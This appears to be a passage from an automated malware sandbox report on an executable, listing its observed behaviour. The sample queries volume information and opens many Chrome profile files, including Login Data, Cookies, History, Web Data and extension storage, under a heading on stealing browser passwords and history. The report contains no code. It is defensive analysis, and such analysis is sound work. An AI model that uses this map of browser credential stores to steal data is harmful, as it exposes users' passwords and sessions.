Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\WebStorage VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_0	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_3	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\the-real-index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Reporting and NEL	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Network Persistent State	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Trust Tokens	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886879273065	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886879173047	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\index	Jump to behavior
